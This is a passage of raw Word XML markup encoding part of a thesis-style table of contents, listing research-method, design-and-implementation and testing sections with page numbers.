            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0334355F" w14:textId="60502DD1"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16" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 RESEARCH PHILOSOPHY</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_Toc87032916 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04F02D05" w14:textId="5DE06B4A"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17" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 RESEARCH APPROACH</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_Toc87032917 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CFBD271" w14:textId="07BEC9A4"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18" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Literature Reviews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_Toc87032918 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33C4F74F" w14:textId="7FC9619C"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19" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Experimental Approach 1</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_Toc87032919 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26505A1C" w14:textId="4FF9E08A"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20" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Experimental Approach 2</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_Toc87032920 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="739DB0E5" w14:textId="401A728D"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21" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 RESEARCH STRATEGY</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_Toc87032921 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03984166" w14:textId="2C9AF37D"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22" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4 TIME HORIZONS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_Toc87032922 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03119171" w14:textId="73ED998E"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23" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5 DATA COLLECTION AND ANALYSIS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_Toc87032923 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5405560B" w14:textId="6D7A2FEF"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24" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6 RESEARCH DESIGN</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_Toc87032924 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BC2D477" w14:textId="3AE280B2"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25" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7 DELIVERABLES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_Toc87032925 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C5DBC5D" w14:textId="4E388049"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26" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8 RISKS &amp; LIMITATIONS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_Toc87032926 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="230FFB40" w14:textId="200350EC"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27" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9 RESOURCES AND PLANNING</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_Toc87032927 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37269A52" w14:textId="32BAF5AB"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28" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032928 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EFB0DFC" w14:textId="0D97667D" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032929" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 5</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - DESIGN AND IMPLEMENTATION</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_Toc87032929 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6054605A" w14:textId="207FD29A"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30" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</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_Toc87032930 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20013470" w14:textId="683C6D89"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31" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 PROBLEM FORMULATION</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_Toc87032931 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69457B0F" w14:textId="36A202FE"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32" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 DESIGN</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_Toc87032932 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="298EEE81" w14:textId="1E7885EE"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33" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 IMPLEMENTATION</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_Toc87032933 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B608E99" w14:textId="70072704"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34" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032934 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="724B6536" w14:textId="23837E06" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032935" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 6</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> -TESTING AND EXPERIMENT</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_Toc87032935 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5176BC88" w14:textId="7B8C4AC0"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36" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</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_Toc87032936 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
